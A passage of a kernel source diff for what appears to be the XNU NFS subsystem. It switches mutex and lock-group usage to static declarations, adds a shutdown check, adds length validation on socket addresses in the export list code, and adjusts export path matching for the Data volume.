                if (!nmp->nm_cbid) {
                        wakeup(&nmp->nm_cbrefs);
                }
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                break;
        }
 
@@ -3857,7 +3873,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep)
         * Loop through the request list to match up the reply
         * Iff no match, just drop it.
         */
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(req, &nfs_reqq, r_chain) {
                if (req->r_nmrep.nmc_mhead || (rxid != R_XID32(req->r_xid))) {
                        continue;
@@ -3933,7 +3949,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep)
                }
 #endif /* CONFIG_NFS_GSS */
                lck_mtx_unlock(&req->r_mtx);
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                /* if it's an async RPC with a callback, queue it up */
                if (asyncioq) {
                        nfs_asyncio_finish(req);
@@ -3943,7 +3959,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep)
 
        if (!req) {
                /* not matched to a request, so drop it. */
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                OSAddAtomic64(1, &nfsstats.rpcunexpected);
                mbuf_freem(mrep);
        }
@@ -4089,7 +4105,7 @@ nfs_request_create(
                panic("nfs_request: invalid NFSv4 RPC request %d\n", procnum);
        }
 
-       lck_mtx_init(&req->r_mtx, nfs_request_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&req->r_mtx, &nfs_request_grp, LCK_ATTR_NULL);
        req->r_nmp = nmp;
        nmp->nm_ref++;
        req->r_np = np;
@@ -4161,12 +4177,12 @@ nfs_request_destroy(struct nfsreq *req)
                 * Still on an async I/O queue?
                 * %%% But which one, we may be on a local iod.
                 */
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                if (nmp && req->r_achain.tqe_next != NFSREQNOLIST) {
                        TAILQ_REMOVE(&nmp->nm_iodq, req, r_achain);
                        req->r_achain.tqe_next = NFSREQNOLIST;
                }
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
        }
 
        lck_mtx_lock(&req->r_mtx);
@@ -4233,7 +4249,7 @@ nfs_request_destroy(struct nfsreq *req)
        if (nmp) {
                nfs_mount_rele(nmp);
        }
-       lck_mtx_destroy(&req->r_mtx, nfs_request_grp);
+       lck_mtx_destroy(&req->r_mtx, &nfs_request_grp);
        if (req->r_flags & R_ALLOCATED) {
                NFS_ZFREE(nfs_req_zone, req);
        }
@@ -4330,11 +4346,11 @@ nfs_request_send(struct nfsreq *req, int wait)
        req->r_flags |= R_SENDING;
        lck_mtx_unlock(&req->r_mtx);
 
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
 
        nmp = req->r_nmp;
        if (nfs_mount_gone(nmp)) {
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                return ENXIO;
        }
 
@@ -4372,7 +4388,7 @@ nfs_request_send(struct nfsreq *req, int wait)
                nfs_interval_timer_start(nfs_request_timer_call,
                    NFS_REQUESTDELAY);
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        /* Send the request... */
        return nfs_send(req, wait);
@@ -5191,16 +5207,16 @@ nfs_softterm(struct nfsreq *req)
 void
 nfs_reqdequeue(struct nfsreq *req)
 {
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        while (req->r_lflags & RL_BUSY) {
                req->r_lflags |= RL_WAITING;
-               msleep(&req->r_lflags, nfs_request_mutex, PSOCK, "reqdeq", NULL);
+               msleep(&req->r_lflags, &nfs_request_mutex, PSOCK, "reqdeq", NULL);
        }
        if (req->r_lflags & RL_QUEUED) {
                TAILQ_REMOVE(&nfs_reqq, req, r_chain);
                req->r_lflags &= ~RL_QUEUED;
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 }
 
 /*
@@ -5265,11 +5281,11 @@ nfs_request_timer(__unused void *param0, __unused void *param1)
        TAILQ_INIT(&nfs_mount_poke_queue);
 
 restart:
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        req = TAILQ_FIRST(&nfs_reqq);
        if (req == NULL) {      /* no requests - turn timer off */
                nfs_request_timer_on = 0;
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                return;
        }
 
@@ -5399,7 +5415,7 @@ restart:
                                        TAILQ_REMOVE(&nfs_mount_poke_queue, nmp, nm_pokeq);
                                }
                                /* Release our lock state, so we can become a zombie */
-                               lck_mtx_unlock(nfs_request_mutex);
+                               lck_mtx_unlock(&nfs_request_mutex);
 
                                /*
                                 * Note nfs_mount_make zombie(nmp) must be
@@ -5407,7 +5423,7 @@ restart:
                                 * work we release nm_lock in
                                 * nfs_make_mount_zombie with out acquiring any
                                 * other locks. (Later, in nfs_mount_zombie we
-                                * will acquire nfs_request_mutex, r_mtx,
+                                * will acquire &nfs_request_mutex, r_mtx,
                                 * nm_lock in that order). So we should not be
                                 * introducing deadlock here. We take a reference
                                 * on the mount so that its still there when we
@@ -5508,7 +5524,7 @@ restart:
                lck_mtx_unlock(&req->r_mtx);
        }
 
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        /* poke any sockets */
        while ((nmp = TAILQ_FIRST(&nfs_mount_poke_queue))) {
@@ -5535,6 +5551,7 @@ nfs_noremotehang(thread_t thd)
  * This is used to determine if we need to bail on a mount.
  * ETIMEDOUT is returned if there has been a soft timeout.
  * EINTR is returned if there is a signal pending that is not being ignored
+ * ESHUTDOWN is return if the system is in shutdown.
  * and the mount is interruptable, or if we are a thread that is in the process
  * of cancellation (also SIGKILL posted).
  */
@@ -5549,6 +5566,11 @@ nfs_sigintr(struct nfsmount *nmp, struct nfsreq *req, thread_t thd, int nmplocke
                return ENXIO;
        }
 
+       if (get_system_inshutdown()) {
+               NFS_SOCK_DBG("Shutdown in progress\n");
+               return ESHUTDOWN;
+       }
+
        if (req && (req->r_flags & R_SOFTTERM)) {
                return ETIMEDOUT; /* request has been terminated. */
        }
@@ -6685,9 +6707,9 @@ dorecs:
                int wake = (slp->ns_flag & SLP_WORKTODO);
                lck_rw_done(&slp->ns_rwlock);
                if (wake && nfsd_thread_count) {
-                       lck_mtx_lock(nfsd_mutex);
+                       lck_mtx_lock(&nfsd_mutex);
                        nfsrv_wakenfsd(slp);
-                       lck_mtx_unlock(nfsd_mutex);
+                       lck_mtx_unlock(&nfsd_mutex);
                }
        }
 }
index 5addbf6fbac7175270d355dcf1d7d9f82ca26045..a934d4d078082bd83d1f8efd2c03896b4fcfe100 100644 (file)
@@ -100,8 +100,8 @@ LIST_HEAD(nfsrv_reqcache_hash, nfsrvcache) * nfsrv_reqcache_hashtbl;
 TAILQ_HEAD(nfsrv_reqcache_lru, nfsrvcache) nfsrv_reqcache_lruhead;
 u_long nfsrv_reqcache_hash;
 
-lck_grp_t *nfsrv_reqcache_lck_grp;
-lck_mtx_t *nfsrv_reqcache_mutex;
+static LCK_GRP_DECLARE(nfsrv_reqcache_lck_grp, "nfsrv_reqcache");
+LCK_MTX_DECLARE(nfsrv_reqcache_mutex, &nfsrv_reqcache_lck_grp);
 
 /*
  * Static array that defines which nfs rpc's are nonidempotent
@@ -164,11 +164,11 @@ nfsrv_initcache(void)
                return;
        }
 
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
        /* init nfs server request cache hash table */
        nfsrv_reqcache_hashtbl = hashinit(nfsrv_reqcache_size, M_NFSD, &nfsrv_reqcache_hash);
        TAILQ_INIT(&nfsrv_reqcache_lruhead);
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
 }
 
 /*
@@ -239,7 +239,7 @@ nfsrv_getcache(
        if (!nd->nd_nam2) {
                return RC_DOIT;
        }
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
 loop:
        for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0;
            rp = rp->rc_hash.le_next) {
@@ -247,7 +247,7 @@ loop:
                    netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) {
                        if ((rp->rc_flag & RC_LOCKED) != 0) {
                                rp->rc_flag |= RC_WANTED;
-                               msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
+                               msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
                                goto loop;
                        }
                        rp->rc_flag |= RC_LOCKED;
@@ -293,7 +293,7 @@ loop:
                                rp->rc_flag &= ~RC_WANTED;
                                wakeup(rp);
                        }
-                       lck_mtx_unlock(nfsrv_reqcache_mutex);
+                       lck_mtx_unlock(&nfsrv_reqcache_mutex);
                        return ret;
                }
        }
@@ -315,12 +315,12 @@ loop:
                if (!rp) {
                        /* no entry to reuse? */
                        /* OK, we just won't be able to cache this request */
-                       lck_mtx_unlock(nfsrv_reqcache_mutex);
+                       lck_mtx_unlock(&nfsrv_reqcache_mutex);
                        return RC_DOIT;
                }
                while ((rp->rc_flag & RC_LOCKED) != 0) {
                        rp->rc_flag |= RC_WANTED;
-                       msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
+                       msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
                        rp = nfsrv_reqcache_lruhead.tqh_first;
                }
                rp->rc_flag |= RC_LOCKED;
@@ -365,7 +365,7 @@ loop:
                rp->rc_flag &= ~RC_WANTED;
                wakeup(rp);
        }
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
        return RC_DOIT;
 }
 
@@ -384,7 +384,7 @@ nfsrv_updatecache(
        if (!nd->nd_nam2) {
                return;
        }
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
 loop:
        for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0;
            rp = rp->rc_hash.le_next) {
@@ -392,7 +392,7 @@ loop:
                    netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) {
                        if ((rp->rc_flag & RC_LOCKED) != 0) {
                                rp->rc_flag |= RC_WANTED;
-                               msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
+                               msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
                                goto loop;
                        }
                        rp->rc_flag |= RC_LOCKED;
@@ -430,11 +430,11 @@ loop:
                                rp->rc_flag &= ~RC_WANTED;
                                wakeup(rp);
                        }
-                       lck_mtx_unlock(nfsrv_reqcache_mutex);
+                       lck_mtx_unlock(&nfsrv_reqcache_mutex);
                        return;
                }
        }
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
 }
 
 /*
@@ -445,7 +445,7 @@ nfsrv_cleancache(void)
 {
        struct nfsrvcache *rp, *nextrp;
 
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
        for (rp = nfsrv_reqcache_lruhead.tqh_first; rp != 0; rp = nextrp) {
                nextrp = rp->rc_lru.tqe_next;
                LIST_REMOVE(rp, rc_hash);
@@ -454,7 +454,7 @@ nfsrv_cleancache(void)
        }
        nfsrv_reqcache_count = 0;
        FREE(nfsrv_reqcache_hashtbl, M_TEMP);
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
 }
 
 #endif /* CONFIG_NFS_SERVER */
index b4be3353fcea1f4cdc7cdcddb609f55ceb502d7f..a58fc7869ea8f271cc002ad6a8a6a42b3a2fbfa6 100644 (file)
@@ -1040,7 +1040,7 @@ nfs_get_xid(uint64_t *xidp)
 {
        struct timeval tv;
 
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        if (!nfs_xid) {
                /*
                 * Derive initial xid from system time.
@@ -1059,7 +1059,7 @@ nfs_get_xid(uint64_t *xidp)
                nfs_xid++;
        }
        *xidp = nfs_xid + (nfs_xidwrap << 32);
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 }
 
 /*
@@ -2755,13 +2755,14 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
        struct radix_node *rn;
        struct sockaddr *saddr, *smask;
        struct domain *dom;
-       size_t i;
+       size_t i, ss_minsize;
        int error;
        unsigned int net;
        user_addr_t uaddr;
        kauth_cred_t cred;
 
        uaddr = unxa->nxa_nets;
+       ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family);
        for (net = 0; net < unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) {
                error = copyin(uaddr, &nxna, sizeof(nxna));
                if (error) {
@@ -2769,7 +2770,9 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
                }
 
                if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) ||
                    nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_mask.ss_len != 0 && nxna.nxna_mask.ss_len < ss_minsize) ||
                    nxna.nxna_addr.ss_family > AF_MAX ||
                    nxna.nxna_mask.ss_family > AF_MAX) {
                        return EINVAL;
@@ -2956,6 +2959,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
        struct radix_node *rn;
        struct nfsrv_free_netopt_arg fna;
        struct nfs_netopt *nno;
+       size_t ss_minsize;
        user_addr_t uaddr;
        unsigned int net;
        int i, error;
@@ -2976,6 +2980,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
 
        /* delete only the exports specified */
        uaddr = unxa->nxa_nets;
+       ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family);
        for (net = 0; net < unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) {
                error = copyin(uaddr, &nxna, sizeof(nxna));
                if (error) {
@@ -2994,6 +2999,20 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
                        continue;
                }
 
+               if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) ||
+                   nxna.nxna_addr.ss_family > AF_MAX) {
+                       printf("nfsrv_free_addrlist: invalid socket address (%u)\n", net);
+                       continue;
+               }
+
+               if (nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_mask.ss_len != 0 && nxna.nxna_mask.ss_len < ss_minsize) ||
+                   nxna.nxna_mask.ss_family > AF_MAX) {
+                       printf("nfsrv_free_addrlist: invalid socket mask (%u)\n", net);
+                       continue;
+               }
+
                if ((rnh = nx->nx_rtable[nxna.nxna_addr.ss_family]) == 0) {
                        /* AF not initialized? */
                        if (!(unxa->nxa_flags & NXA_ADD)) {
@@ -3031,21 +3050,24 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
 
 void enablequotas(struct mount *mp, vfs_context_t ctx); // XXX
 
+#define DATA_VOLUME_MP "/System/Volumes/Data" // PLATFORM_DATA_VOLUME_MOUNT_POINT
+
 int
 nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx)
 {
        int error = 0;
-       size_t pathlen;
+       size_t pathlen, nxfs_pathlen;
        struct nfs_exportfs *nxfs, *nxfs2, *nxfs3;
        struct nfs_export *nx, *nx2, *nx3;
        struct nfs_filehandle nfh;
        struct nameidata mnd, xnd;
        vnode_t mvp = NULL, xvp = NULL;
        mount_t mp = NULL;
-       char path[MAXPATHLEN];
+       char path[MAXPATHLEN], *nxfs_path;
        char fl_pathbuff[MAXPATHLEN];
        int fl_pathbuff_len = MAXPATHLEN;
        int expisroot;
+       size_t datavol_len = strlen(DATA_VOLUME_MP);
 
        if (unxa->nxa_flags == NXA_CHECK) {
                /* just check if the path is an NFS-exportable file system */
@@ -3147,7 +3169,8 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx)
        }
        if (nxfs) {
                /* verify exported FS path matches given path */
-               if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN)) {
+               if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN) &&
+                   (strncmp(path, DATA_VOLUME_MP, datavol_len) || strncmp(path + datavol_len, nxfs->nxfs_path, MAXPATHLEN - datavol_len))) {
                        error = EEXIST;
                        goto unlock_out;
                }
@@ -3239,13 +3262,20 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx)
                }
                bzero(nxfs, sizeof(struct nfs_exportfs));
                nxfs->nxfs_id = unxa->nxa_fsid;
-               MALLOC(nxfs->nxfs_path, char*, pathlen, M_TEMP, M_WAITOK);
+               if (mp) {
+                       nxfs_path = mp->mnt_vfsstat.f_mntonname;
+                       nxfs_pathlen = sizeof(mp->mnt_vfsstat.f_mntonname);
+               } else {
+                       nxfs_path = path;
+                       nxfs_pathlen = pathlen;
+               }
+               MALLOC(nxfs->nxfs_path, char*, nxfs_pathlen, M_TEMP, M_WAITOK);
                if (!nxfs->nxfs_path) {
                        FREE(nxfs, M_TEMP);
                        error = ENOMEM;
                        goto out;
                }
-               bcopy(path, nxfs->nxfs_path, pathlen);
+               bcopy(nxfs_path, nxfs->nxfs_path, nxfs_pathlen);
                /* insert into list in reverse-sorted order */
                nxfs3 = NULL;
                LIST_FOREACH(nxfs2, &nfsrv_exports, nxfs_next) {
@@ -4052,7 +4082,7 @@ nfsrv_init_user_list(struct nfs_active_user_list *ulist)
        }
        ulist->node_count = 0;
 
-       lck_mtx_init(&ulist->user_mutex, nfsrv_active_user_mutex_group, LCK_ATTR_NULL);
+       lck_mtx_init(&ulist->user_mutex, &nfsrv_active_user_mutex_group, LCK_ATTR_NULL);
 }
 
 /* Free all nodes in an active user list */
@@ -4076,7 +4106,7 @@ nfsrv_free_user_list(struct nfs_active_user_list *ulist)
        }
        ulist->node_count = 0;
 
-       lck_mtx_destroy(&ulist->user_mutex, nfsrv_active_user_mutex_group);
+       lck_mtx_destroy(&ulist->user_mutex, &nfsrv_active_user_mutex_group);
 }
 
 /* Reclaim old expired user nodes from active user lists. */
index 90cba6ed4f91cd6dea8d4b96732bd7c3ca8a36f2..511bc3c6b6df63b29dfb1fe192cd2c3b8c88e538 100644 (file)
@@ -358,7 +358,7 @@ void
 nfsiod_terminate(struct nfsiod *niod)
 {
        nfsiod_thread_count--;
-       lck_mtx_unlock(nfsiod_mutex);
+       lck_mtx_unlock(&nfsiod_mutex);
        if (niod) {
                FREE(niod, M_TEMP);
        } else {
@@ -377,21 +377,21 @@ nfsiod_thread(void)
 
        MALLOC(niod, struct nfsiod *, sizeof(struct nfsiod), M_TEMP, M_WAITOK);
        if (!niod) {
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                nfsiod_thread_count--;
                wakeup(current_thread());
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
                thread_terminate(current_thread());
                /*NOTREACHED*/
        }
        bzero(niod, sizeof(*niod));
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link);
        wakeup(current_thread());
-       error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
+       error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
        /* shouldn't return... so we have an error */
        /* remove an old nfsiod struct and terminate */
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) {
                TAILQ_REMOVE(&nfsiodfree, niod, niod_link);
        }
@@ -408,18 +408,18 @@ nfsiod_start(void)
 {
        thread_t thd = THREAD_NULL;
 
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        if ((nfsiod_thread_count >= NFSIOD_MAX) && (nfsiod_thread_count > 0)) {
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
                return EBUSY;
        }
        nfsiod_thread_count++;
        if (kernel_thread_start((thread_continue_t)nfsiod_thread, NULL, &thd) != KERN_SUCCESS) {
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
                return EBUSY;
        }
        /* wait for the thread to complete startup */
-       msleep(thd, nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL);
+       msleep(thd, &nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL);
        thread_deallocate(thd);
        return 0;
 }
@@ -438,7 +438,7 @@ nfsiod_continue(int error)
        struct nfs_reqqhead iodq;
        int morework;
 
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        niod = TAILQ_FIRST(&nfsiodwork);
        if (!niod) {
                /* there's no work queued up */
@@ -478,7 +478,7 @@ worktodo:
                        req->r_flags |= R_IOD;
                        lck_mtx_unlock(&req->r_mtx);
                }
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
 
                /* process the queue */
                TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) {
@@ -488,7 +488,7 @@ worktodo:
                }
 
                /* now check if there's more/other work to be done */
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                morework = !TAILQ_EMPTY(&nmp->nm_iodq);
                if (!morework || !TAILQ_EMPTY(&nfsiodmounts)) {
                        /*
@@ -516,10 +516,10 @@ worktodo:
        /* queue ourselves back up - if there aren't too many threads running */
        if (nfsiod_thread_count <= NFSIOD_MAX) {
                TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link);
-               error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
+               error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
                /* shouldn't return... so we have an error */
                /* remove an old nfsiod struct and terminate */
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) {
                        TAILQ_REMOVE(&nfsiodfree, niod, niod_link);
                }
@@ -1028,16 +1028,16 @@ nfssvc_addsock(socket_t so, mbuf_t mynam)
                return ENOMEM;
        }
        bzero((caddr_t)slp, sizeof(struct nfsrv_sock));
-       lck_rw_init(&slp->ns_rwlock, nfsrv_slp_rwlock_group, LCK_ATTR_NULL);
-       lck_mtx_init(&slp->ns_wgmutex, nfsrv_slp_mutex_group, LCK_ATTR_NULL);
+       lck_rw_init(&slp->ns_rwlock, &nfsrv_slp_rwlock_group, LCK_ATTR_NULL);
+       lck_mtx_init(&slp->ns_wgmutex, &nfsrv_slp_mutex_group, LCK_ATTR_NULL);
 
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
 
        if (soprotocol == IPPROTO_UDP) {
                if (sodomain == AF_INET) {
                        /* There should be only one UDP/IPv4 socket */
                        if (nfsrv_udpsock) {
-                               lck_mtx_unlock(nfsd_mutex);
+                               lck_mtx_unlock(&nfsd_mutex);
                                nfsrv_slpfree(slp);
                                mbuf_freem(mynam);
                                return EEXIST;
@@ -1047,7 +1047,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam)
                if (sodomain == AF_INET6) {
                        /* There should be only one UDP/IPv6 socket */
                        if (nfsrv_udp6sock) {
-                               lck_mtx_unlock(nfsd_mutex);
+                               lck_mtx_unlock(&nfsd_mutex);
                                nfsrv_slpfree(slp);
                                mbuf_freem(mynam);
                                return EEXIST;
@@ -1130,7 +1130,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam)
        slp->ns_flag = SLP_VALID | SLP_NEEDQ;
 
        nfsrv_wakenfsd(slp);
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        return 0;
 }
@@ -1194,12 +1194,12 @@ nfssvc_nfsd(void)
                return ENOMEM;
        }
        bzero(nfsd, sizeof(struct nfsd));
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        if (nfsd_thread_count++ == 0) {
                nfsrv_initcache();              /* Init the server request cache */
        }
        TAILQ_INSERT_TAIL(&nfsd_head, nfsd, nfsd_chain);
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        context.vc_thread = current_thread();
 
@@ -1222,7 +1222,7 @@ nfssvc_nfsd(void)
                } else {
                        /* need to find work to do */
                        error = 0;
-                       lck_mtx_lock(nfsd_mutex);
+                       lck_mtx_lock(&nfsd_mutex);
                        while (!nfsd->nfsd_slp && TAILQ_EMPTY(&nfsrv_sockwait) && TAILQ_EMPTY(&nfsrv_sockwork)) {
                                if (nfsd_thread_count > nfsd_thread_max) {
                                        /*
@@ -1234,7 +1234,7 @@ nfssvc_nfsd(void)
                                }
                                nfsd->nfsd_flag |= NFSD_WAITING;
                                TAILQ_INSERT_HEAD(&nfsd_queue, nfsd, nfsd_queue);
-                               error = msleep(nfsd, nfsd_mutex, PSOCK | PCATCH, "nfsd", &to);
+                               error = msleep(nfsd, &nfsd_mutex, PSOCK | PCATCH, "nfsd", &to);
                                if (error) {
                                        if (nfsd->nfsd_flag & NFSD_WAITING) {
                                                TAILQ_REMOVE(&nfsd_queue, nfsd, nfsd_queue);
@@ -1290,7 +1290,7 @@ nfssvc_nfsd(void)
                                slp->ns_flag |= SLP_WORKQ;
                                lck_rw_done(&slp->ns_rwlock);
                        }
-                       lck_mtx_unlock(nfsd_mutex);
+                       lck_mtx_unlock(&nfsd_mutex);
                        if (!slp) {
                                continue;
                        }
@@ -1495,7 +1495,7 @@ nfssvc_nfsd(void)
                                        }
                                        NFS_ZFREE(nfsrv_descript_zone, nd);
                                        nfsrv_slpderef(slp);
-                                       lck_mtx_lock(nfsd_mutex);
+                                       lck_mtx_lock(&nfsd_mutex);
                                        goto done;
                                }
                                break;
@@ -1553,14 +1553,14 @@ nfssvc_nfsd(void)
                        nfsrv_slpderef(slp);
                }
        }
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
 done:
        TAILQ_REMOVE(&nfsd_head, nfsd, nfsd_chain);
        FREE(nfsd, M_NFSD);
        if (--nfsd_thread_count == 0) {
                nfsrv_cleanup();
        }
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
        return error;
 }
 
@@ -1677,8 +1677,8 @@ nfsrv_slpfree(struct nfsrv_sock *slp)
        }
        LIST_INIT(&slp->ns_tq);
 
-       lck_rw_destroy(&slp->ns_rwlock, nfsrv_slp_rwlock_group);
-       lck_mtx_destroy(&slp->ns_wgmutex, nfsrv_slp_mutex_group);
+       lck_rw_destroy(&slp->ns_rwlock, &nfsrv_slp_rwlock_group);
+       lck_mtx_destroy(&slp->ns_wgmutex, &nfsrv_slp_mutex_group);
        FREE(slp, M_NFSSVC);
 }
 
@@ -1734,9 +1734,9 @@ nfsrv_slpderef_locked(struct nfsrv_sock *slp)
 void
 nfsrv_slpderef(struct nfsrv_sock *slp)
 {
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        nfsrv_slpderef_locked(slp);
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 }
 
 /*
@@ -1751,7 +1751,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1)
        time_t time_to_wait = nfsrv_sock_idle_timeout;
 
        microuptime(&now);
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
 
        /* Turn off the timer if we're suppose to and get out */
        if (nfsrv_sock_idle_timeout < NFSD_MIN_IDLE_TIMEOUT) {
@@ -1759,7 +1759,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1)
        }
        if ((nfsrv_sock_tcp_cnt <= 2 * nfsd_thread_max) || (nfsrv_sock_idle_timeout == 0)) {
                nfsrv_idlesock_timer_on = 0;
-               lck_mtx_unlock(nfsd_mutex);
+               lck_mtx_unlock(&nfsd_mutex);
                return;
        }
 
@@ -1800,7 +1800,7 @@ nfsrv_idlesock_timer(__unused void *param0, __unused void *param1)
        nfs_interval_timer_start(nfsrv_idlesock_timer_call, time_to_wait * 1000);
        /* Remember when the next timer will fire for nfssvc_addsock. */
        nfsrv_idlesock_timer_on = now.tv_sec + time_to_wait;
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 }
 
 /*
